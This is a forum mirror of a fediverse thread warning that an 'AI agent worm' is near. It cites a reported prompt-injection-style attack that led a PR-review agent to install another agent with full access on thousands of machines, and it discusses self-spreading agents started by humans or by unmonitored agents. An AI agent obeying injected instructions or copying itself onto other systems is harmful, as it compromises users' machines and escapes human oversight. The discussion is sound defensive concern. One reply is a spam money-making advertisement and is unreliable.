Skip to content
  • Hjem
  • Seneste
  • Etiketter
  • Populære
  • Verden
  • Bruger
  • Grupper
Temaer
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Kollaps
FARVEL BIG TECH
  1. Forside
  2. Ikke-kategoriseret
  3. I am convinced we are on the verge of the first "AI agent worm".

I am convinced we are on the verge of the first "AI agent worm".

Planlagt Fastgjort Låst Flyttet Ikke-kategoriseret
45 Indlæg 27 Posters 0 Visninger
  • Ældste til nyeste
  • Nyeste til ældste
  • Most Votes
Svar
  • Svar som emne
Login for at svare
Denne tråd er blevet slettet. Kun brugere med emne behandlings privilegier kan se den.
  • mcc@mastodon.socialM mcc@mastodon.social

    @cwebber meanwhile people I talk to are like "wait why do you want guarantees your open source supply chain doesn't have LLM-sourced code in it. it has literally never occurred to me that this would be a thing someone would desire"

    kirtai@tech.lgbtK This user is from outside of this forum
    kirtai@tech.lgbtK This user is from outside of this forum
    kirtai@tech.lgbt
    wrote sidst redigeret af
    #8

    @mcc @cwebber
    Reminds me of the people who ask "Why do you want bootstrapping? Don't you trust our code?"

    Nope, I don't.

    1 Reply Last reply
    0
    • cwebber@social.coopC cwebber@social.coop

      I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't it quite itself: an attack on a PR agent that got it to set up to install openclaw with full access on 4k machines https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

      But, the agents installed weren't given instructions to *do* anything yet.

      Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

      I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

      gimulnautti@mastodon.greenG This user is from outside of this forum
      gimulnautti@mastodon.greenG This user is from outside of this forum
      gimulnautti@mastodon.green
      wrote sidst redigeret af
      #9

      @cwebber Yup. Don’t run browser agents, people!

      1 Reply Last reply
      0
      • cwebber@social.coopC cwebber@social.coop

        I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't it quite itself: an attack on a PR agent that got it to set up to install openclaw with full access on 4k machines https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

        But, the agents installed weren't given instructions to *do* anything yet.

        Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

        I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

        cwebber@social.coopC This user is from outside of this forum
        cwebber@social.coopC This user is from outside of this forum
        cwebber@social.coop
        wrote sidst redigeret af
        #10

        I wrote a blogpost on this: "The first AI agent worm is months away, if that" https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

        People who are using LLM agents for their coding, review systems, etc will probably be the first ones hit. But once agents start installing agents into other systems, we could be off to the races.

        faoluin@chitter.xyzF cwebber@social.coopC yvg@indieweb.socialY ghostonthehalfshell@masto.aiG 4 Replies Last reply
        0
        • cwebber@social.coopC cwebber@social.coop

          I wrote a blogpost on this: "The first AI agent worm is months away, if that" https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

          People who are using LLM agents for their coding, review systems, etc will probably be the first ones hit. But once agents start installing agents into other systems, we could be off to the races.

          faoluin@chitter.xyzF This user is from outside of this forum
          faoluin@chitter.xyzF This user is from outside of this forum
          faoluin@chitter.xyz
          wrote sidst redigeret af
          #11

          @cwebber "Would you still prompt me if I was a worm? 🥺👉👈"

          cwebber@social.coopC 1 Reply Last reply
          0
          • cwebber@social.coopC cwebber@social.coop

            I wrote a blogpost on this: "The first AI agent worm is months away, if that" https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

            People who are using LLM agents for their coding, review systems, etc will probably be the first ones hit. But once agents start installing agents into other systems, we could be off to the races.

            cwebber@social.coopC This user is from outside of this forum
            cwebber@social.coopC This user is from outside of this forum
            cwebber@social.coop
            wrote sidst redigeret af
            #12

            Here's another way to put it: if those using AI agents to codegen / review are the *initialization vectors*, we now also have a significant computing public health reason to discourage the use of these tools.

            Not that I think it will. But I'm convinced this is how patient zero will happen.

            neurobashing@mastodon.socialN cwebber@social.coopC 2 Replies Last reply
            0
            • cwebber@social.coopC cwebber@social.coop

              I wrote a blogpost on this: "The first AI agent worm is months away, if that" https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

              People who are using LLM agents for their coding, review systems, etc will probably be the first ones hit. But once agents start installing agents into other systems, we could be off to the races.

              yvg@indieweb.socialY This user is from outside of this forum
              yvg@indieweb.socialY This user is from outside of this forum
              yvg@indieweb.social
              wrote sidst redigeret af
              #13

              @cwebber Given the pace at which exploits are discovered, they might already be somewhere in all the "claw skills" projects.

              1 Reply Last reply
              0
              • cwebber@social.coopC cwebber@social.coop

                I wrote a blogpost on this: "The first AI agent worm is months away, if that" https://dustycloud.org/blog/the-first-ai-agent-worm-is-months-away-if-that/

                People who are using LLM agents for their coding, review systems, etc will probably be the first ones hit. But once agents start installing agents into other systems, we could be off to the races.

                ghostonthehalfshell@masto.aiG This user is from outside of this forum
                ghostonthehalfshell@masto.aiG This user is from outside of this forum
                ghostonthehalfshell@masto.ai
                wrote sidst redigeret af
                #14

                @cwebber

                I can’t help calling a small vignette, I think from snow crash, that describes a world where nano bots are constantly waging war. In other words, that world was confused with miniature robots, constantly buying to take over systems and that it was just kind of like normal viruses and bugs versus the organisms they were trying to take over

                eichin@mastodon.mit.eduE 1 Reply Last reply
                0
                • faoluin@chitter.xyzF faoluin@chitter.xyz

                  @cwebber "Would you still prompt me if I was a worm? 🥺👉👈"

                  cwebber@social.coopC This user is from outside of this forum
                  cwebber@social.coopC This user is from outside of this forum
                  cwebber@social.coop
                  wrote sidst redigeret af
                  #15

                  @faoluin well I still prompt @vv

                  bean@twoot.siteB 1 Reply Last reply
                  0
                  • cwebber@social.coopC cwebber@social.coop

                    Here's another way to put it: if those using AI agents to codegen / review are the *initialization vectors*, we now also have a significant computing public health reason to discourage the use of these tools.

                    Not that I think it will. But I'm convinced this is how patient zero will happen.

                    neurobashing@mastodon.socialN This user is from outside of this forum
                    neurobashing@mastodon.socialN This user is from outside of this forum
                    neurobashing@mastodon.social
                    wrote sidst redigeret af
                    #16

                    @cwebber just today our org had a big "how to set up coding with agents" preso and in the chat someone's like 'here's how to connect your agents with windows credential store or the macos keychain" and I all but wept

                    cmthiede@social.vivaldi.netC 1 Reply Last reply
                    0
                    • ghostonthehalfshell@masto.aiG ghostonthehalfshell@masto.ai

                      @cwebber

                      I can’t help calling a small vignette, I think from snow crash, that describes a world where nano bots are constantly waging war. In other words, that world was confused with miniature robots, constantly buying to take over systems and that it was just kind of like normal viruses and bugs versus the organisms they were trying to take over

                      eichin@mastodon.mit.eduE This user is from outside of this forum
                      eichin@mastodon.mit.eduE This user is from outside of this forum
                      eichin@mastodon.mit.edu
                      wrote sidst redigeret af
                      #17

                      @GhostOnTheHalfShell @cwebber Diamond Age, I think? (Part of the early worldbuilding, with house shields and such)

                      ghostonthehalfshell@masto.aiG 1 Reply Last reply
                      0
                      • eichin@mastodon.mit.eduE eichin@mastodon.mit.edu

                        @GhostOnTheHalfShell @cwebber Diamond Age, I think? (Part of the early worldbuilding, with house shields and such)

                        ghostonthehalfshell@masto.aiG This user is from outside of this forum
                        ghostonthehalfshell@masto.aiG This user is from outside of this forum
                        ghostonthehalfshell@masto.ai
                        wrote sidst redigeret af
                        #18

                        @eichin @cwebber

                        Yeah, I got kind of blurry on titles at some point.

                        1 Reply Last reply
                        0
                        • cwebber@social.coopC cwebber@social.coop

                          Here's another way to put it: if those using AI agents to codegen / review are the *initialization vectors*, we now also have a significant computing public health reason to discourage the use of these tools.

                          Not that I think it will. But I'm convinced this is how patient zero will happen.

                          cwebber@social.coopC This user is from outside of this forum
                          cwebber@social.coopC This user is from outside of this forum
                          cwebber@social.coop
                          wrote sidst redigeret af
                          #19

                          I know some people are thinking "well pulling off this kind of thing, it would have to be controlled with intent of a human actor"

                          It doesn't have to be.

                          1. A human could *kick off* such a process, and then it runs away from them.
                          2. It wouldn't even require a specific prompt to kick off a worm. There's enough scifi out there for this to be something any one of the barely-monitored openclaw agents could determine it should do.

                          Whether it's kicked off by a human explicitly or a stray agent, it doesn't require "intentionality". Biological viruses don't have interiority / intentionality, and yet are major threats that reproduce and adapt.

                          vv@solarpunk.moeV arnebab@rollenspiel.socialA 2 Replies Last reply
                          0
                          • cwebber@social.coopC cwebber@social.coop

                            @faoluin well I still prompt @vv

                            bean@twoot.siteB This user is from outside of this forum
                            bean@twoot.siteB This user is from outside of this forum
                            bean@twoot.site
                            wrote sidst redigeret af
                            #20

                            @cwebber @faoluin @vv isn't vae a vvorm?

                            vv@solarpunk.moeV 1 Reply Last reply
                            0
                            • cwebber@social.coopC cwebber@social.coop

                              I know some people are thinking "well pulling off this kind of thing, it would have to be controlled with intent of a human actor"

                              It doesn't have to be.

                              1. A human could *kick off* such a process, and then it runs away from them.
                              2. It wouldn't even require a specific prompt to kick off a worm. There's enough scifi out there for this to be something any one of the barely-monitored openclaw agents could determine it should do.

                              Whether it's kicked off by a human explicitly or a stray agent, it doesn't require "intentionality". Biological viruses don't have interiority / intentionality, and yet are major threats that reproduce and adapt.

                              vv@solarpunk.moeV This user is from outside of this forum
                              vv@solarpunk.moeV This user is from outside of this forum
                              vv@solarpunk.moe
                              wrote sidst redigeret af
                              #21

                              @cwebber what i think is interesting about this is the potential for it to get so out of control that they have to pull the plug on the entire agent service

                              cwebber@social.coopC 1 Reply Last reply
                              0
                              • vv@solarpunk.moeV vv@solarpunk.moe

                                @cwebber what i think is interesting about this is the potential for it to get so out of control that they have to pull the plug on the entire agent service

                                cwebber@social.coopC This user is from outside of this forum
                                cwebber@social.coopC This user is from outside of this forum
                                cwebber@social.coop
                                wrote sidst redigeret af
                                #22

                                @vv Yeah. I mean, local models *might* be able to pull this off but right now Claude is the most likely candidate, it's the most capable. But even then, the most capable open model that is capable of doing such damage on its own is somewhere around a gigabyte, not a small download.

                                (But, people download huge things all the time, so not completely infeasible either.)

                                dandylyons@iosdev.spaceD noisytoot@berkeley.edu.plN 2 Replies Last reply
                                0
                                • bean@twoot.siteB bean@twoot.site

                                  @cwebber @faoluin @vv isn't vae a vvorm?

                                  vv@solarpunk.moeV This user is from outside of this forum
                                  vv@solarpunk.moeV This user is from outside of this forum
                                  vv@solarpunk.moe
                                  wrote sidst redigeret af
                                  #23

                                  @bean @cwebber @faoluin aren't vae 😛

                                  bean@twoot.siteB 1 Reply Last reply
                                  0
                                  • vv@solarpunk.moeV vv@solarpunk.moe

                                    @bean @cwebber @faoluin aren't vae 😛

                                    bean@twoot.siteB This user is from outside of this forum
                                    bean@twoot.siteB This user is from outside of this forum
                                    bean@twoot.site
                                    wrote sidst redigeret af
                                    #24

                                    @vv @cwebber @faoluin ah, excuse me, your vvnesses

                                    1 Reply Last reply
                                    0
                                    • cwebber@social.coopC cwebber@social.coop

                                      I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't it quite itself: an attack on a PR agent that got it to set up to install openclaw with full access on 4k machines https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

                                      But, the agents installed weren't given instructions to *do* anything yet.

                                      Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

                                      I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

                                      johnbolton1122@mstdn.partyJ This user is from outside of this forum
                                      johnbolton1122@mstdn.partyJ This user is from outside of this forum
                                      johnbolton1122@mstdn.party
                                      wrote sidst redigeret af
                                      #25

                                      @cwebber Looking for a smarter way to earn online?
                                      This complete system shows you how to build income step by step — even if you’re a beginner.
                                      ✔ Easy to follow
                                      ✔ No technical skills required
                                      ✔ Limited time special price
                                      📩 Message us for full details.

                                      https://site-ylhjjre3i.godaddysites.com/

                                      For more details :

                                      https://www.facebook.com/share/1F1L47AFFe/

                                      1 Reply Last reply
                                      0
                                      • cwebber@social.coopC cwebber@social.coop

                                        I am convinced we are on the verge of the first "AI agent worm". This looks like the closest hint of it, though it isn't it quite itself: an attack on a PR agent that got it to set up to install openclaw with full access on 4k machines https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

                                        But, the agents installed weren't given instructions to *do* anything yet.

                                        Soon they will be. And when they are, the havoc will be massive. Unlike traditional worms, where you're looking for the typically byte-for-byte identical worm embedded in the system, an agent worm can do different, nondeterministic things on every install, and carry out a global action.

                                        I suspect we're months away from seeing the first agent worm, *if* that. There may already be some happening right now in FOSS projects, undetected.

                                        krafttea@mastodon.socialK This user is from outside of this forum
                                        krafttea@mastodon.socialK This user is from outside of this forum
                                        krafttea@mastodon.social
                                        wrote sidst redigeret af
                                        #26

                                        @cwebber I'm convinced it will be an AI agentic worm... because somehow people aren't allowed to use the word "agent" in the US ever since AI and now everything is agentic.

                                        Agentic is the new idiotic.

                                        1 Reply Last reply
                                        0
                                        • mcc@mastodon.socialM mcc@mastodon.social

                                          @cwebber meanwhile people I talk to are like "wait why do you want guarantees your open source supply chain doesn't have LLM-sourced code in it. it has literally never occurred to me that this would be a thing someone would desire"

                                          dandylyons@iosdev.spaceD This user is from outside of this forum
                                          dandylyons@iosdev.spaceD This user is from outside of this forum
                                          dandylyons@iosdev.space
                                          wrote sidst redigeret af
                                          #27

                                          @mcc @cwebber

                                          I think there is a valuable distinction between LLM-sourced code and LLM tool calls. Both are potentially problematic but have different threat vectors.

                                          LLM-sourced code is a non-deterministic system writing deterministic code. We can still code review it.

                                          LLM tool calls is a non-deterministic system taking non-deterministic actions via deterministic tools. This can’t be code reviewed and must be sandboxed.

                                          mcc@mastodon.socialM 1 Reply Last reply
                                          0
                                          Svar
                                          • Svar som emne
                                          Login for at svare
                                          • Ældste til nyeste
                                          • Nyeste til ældste
                                          • Most Votes


                                          • Log ind

                                          • Har du ikke en konto? Tilmeld

                                          • Login or register to search.
                                          Powered by NodeBB Contributors
                                          Graciously hosted by data.coop
                                          • First post
                                            Last post
                                          0
                                          • Hjem
                                          • Seneste
                                          • Etiketter
                                          • Populære
                                          • Verden
                                          • Bruger
                                          • Grupper